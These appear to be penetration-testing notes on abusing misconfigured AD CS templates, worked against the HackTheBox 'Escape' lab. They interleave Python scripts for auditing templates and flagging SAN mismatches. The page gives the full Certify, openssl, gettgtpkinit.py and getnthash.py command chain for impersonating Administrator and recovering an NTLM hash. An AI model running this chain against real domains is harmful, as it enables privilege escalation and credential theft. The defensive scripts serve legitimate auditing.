
AD CS

Certificate enrollment

Non-privileged users can request a certificate from the Enterprise Certificate Authority for any of the existing templates which are available for enrollment.

.\Certify.exe find /vulnerable
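The defender-side counterpart of the command above is an audit of the template attributes in the Configuration partition: a template becomes dangerous when the enrollee supplies the subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag), no manager approval (CT_FLAG_PEND_ALL_REQUESTS in msPKI-Enrollment-Flag) or authorized signature (msPKI-RA-Signature) is required, the EKU list permits authentication, and low-privileged principals hold the Enroll right. The script below is an added example, not Certify's code: the template records are constructed and the low_priv_can_enroll field is an assumption standing in for the ACL check on nTSecurityDescriptor that a real audit would perform.

```python
"""Classify AD CS templates for the 'enrollee supplies subject + auth EKU +
no approval' misconfiguration. Added example with constructed records."""

# Bit flags from MS-CRTD (msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag

# EKUs that make an issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

TEMPLATES = [
    {   # constructed record mirroring the template named on this page
        "name": "UserAuthentication",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "low_priv_can_enroll": True,   # assumption: stands in for the ACL check
    },
    {   # constructed record shaped like the built-in 'User' template
        "name": "User",
        "msPKI-Certificate-Name-Flag": 0xA6000000,  # subject built from AD, not enrollee
        "msPKI-Enrollment-Flag": 0x00000029,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4",
                                "1.3.6.1.4.1.311.10.3.4"],
        "low_priv_can_enroll": True,
    },
]


def allows_authentication(ekus):
    """An empty pKIExtendedKeyUsage means 'any purpose', which includes auth."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def template_findings(t):
    """Return human-readable findings for one template record."""
    findings = []
    supplies_subject = bool(t["msPKI-Certificate-Name-Flag"]
                            & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    needs_approval = bool(t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    needs_signatures = t.get("msPKI-RA-Signature", 0) > 0
    auth = allows_authentication(t["pKIExtendedKeyUsage"])
    if supplies_subject:
        findings.append("requester controls the subject/SAN")
    if not needs_approval:
        findings.append("no manager approval")
    if not needs_signatures:
        findings.append("no authorized signature required")
    if auth:
        findings.append("usable for authentication")
    if (supplies_subject and not needs_approval and not needs_signatures
            and auth and t.get("low_priv_can_enroll", False)):
        findings.insert(0, "HIGH: low-privileged enrollees can obtain a "
                           "certificate for an arbitrary identity")
    return findings


def is_high_risk(t):
    """True when the template combines every condition listed above."""
    return any(f.startswith("HIGH:") for f in template_findings(t))


def audit(templates):
    """Map template name -> findings; only high-risk templates are returned."""
    return {t["name"]: template_findings(t) for t in templates if is_high_risk(t)}


if __name__ == "__main__":
    for name, findings in audit(TEMPLATES).items():
        print(name)
        for f in findings:
            print("  -", f)
```

Remediation follows directly from the findings: clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on templates used for authentication, or require manager approval, and restrict the Enroll right to the groups that need it.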

Certificate extraction

.\Certify.exe request /template:UserAuthentication /ca:dc.sequel.htb\sequel-DC-CA /altname:administrator@sequel.htb
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END CERTIFICATE-----
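The request above asks the CA for a certificate whose SAN names a different account than the requester, which is also the signal a defender looks for: in the CA database (for instance an export produced with certutil -view) the Requester Name and the UPN in the issued certificate's SAN should refer to the same account. The script below is an added example, not part of this page or of PKINITtools; the CSV rows are constructed (the column names and the accounts lowpriv and WS01$ are assumptions), and it only compares the account part of the UPN because the NetBIOS domain in the requester name normally differs from the DNS suffix in the UPN.

```python
"""Flag issued certificates whose SAN UPN does not match the requester.
Added example over a constructed CA-database export (CSV)."""
import csv
import io

# Constructed sample export, not real CA data: one row per issued certificate.
SAMPLE_EXPORT = """\
RequestID,RequesterName,CertificateTemplate,IssuedUPN
41,SEQUEL\\lowpriv,User,lowpriv@sequel.htb
42,SEQUEL\\lowpriv,UserAuthentication,administrator@sequel.htb
43,SEQUEL\\WS01$,Machine,
44,SEQUEL\\Administrator,UserAuthentication,administrator@sequel.htb
"""


def requester_account(requester):
    """'DOMAIN\\name' -> ('domain', 'name'), lower-cased; domain may be empty."""
    domain, _, name = requester.rpartition("\\")
    return domain.lower(), name.lower()


def upn_parts(upn):
    """'name@suffix' -> ('name', 'suffix'), lower-cased."""
    name, _, suffix = upn.partition("@")
    return name.lower(), suffix.lower()


def san_mismatches(csv_text):
    """Return the rows where the SAN UPN names an account other than the requester."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        upn = row["IssuedUPN"].strip()
        if not upn:
            continue  # no UPN in the SAN: nothing to compare against
        _, req_name = requester_account(row["RequesterName"])
        upn_name, _ = upn_parts(upn)
        if upn_name != req_name:
            hits.append({
                "request_id": row["RequestID"],
                "requester": row["RequesterName"],
                "template": row["CertificateTemplate"],
                "upn": upn,
            })
    return hits


if __name__ == "__main__":
    for hit in san_mismatches(SAMPLE_EXPORT):
        print(f"request {hit['request_id']}: {hit['requester']} obtained a "
              f"certificate for {hit['upn']} via template {hit['template']}")
```

A hit is the trigger to revoke the certificate and review the template it came from; request 44 is not reported because the requester and the SAN UPN are the same account.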

User persistence

Certificates that have been exported in .pem format can be converted to .pfx in order to be compatible with Rubeus and installed directly into the certificate store. A .pfx (PKCS#12) file acts as an archive that bundles the certificate together with its private key, so it contains everything needed to deploy the identity on the system.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

A Ticket Granting Ticket (TGT) can be requested with Rubeus from the Kerberos Key Distribution Center (KDC) for the enrolled user.

Similarly to Rubeus, the TGT can be obtained with "gettgtpkinit.py" by supplying the .pfx certificate and the user to which the certificate has been issued. This script writes the TGT into the specified ccache file and prints the AS-REP encryption key needed by the next step.

python3 gettgtpkinit.py sequel.htb/Administrator -cert-pfx ~/HTB/Machines/Escape/cert.pfx ticket.ccache -dc-ip 10.10.11.202

To use getnthash.py, set the TGT file path in the KRB5CCNAME environment variable.

export KRB5CCNAME=/home/kali/Tools/PKINITtools/ticket.ccache

The AS-REP encryption key which has been retrieved previously can be used with the getnthash.py utility in order to recover the NTLM hash from the PAC.

python3 getnthash.py sequel.htb/Administrator -key c32342c92f2ba6288f7c90652b5eec9a74ef76741504fa38778656019ee14011 -dc-ip 10.10.11.202

Sometimes, the following error is obtained when using the PKINIT tools:

KRB_AP_ERR_SKEW Detail: "The clock skew is too great"

In that case, run the following command:

sudo ntpdate <DC IP>

Last updated 2 years ago

Github repository:

https://github.com/dirkjanm/PKINITtools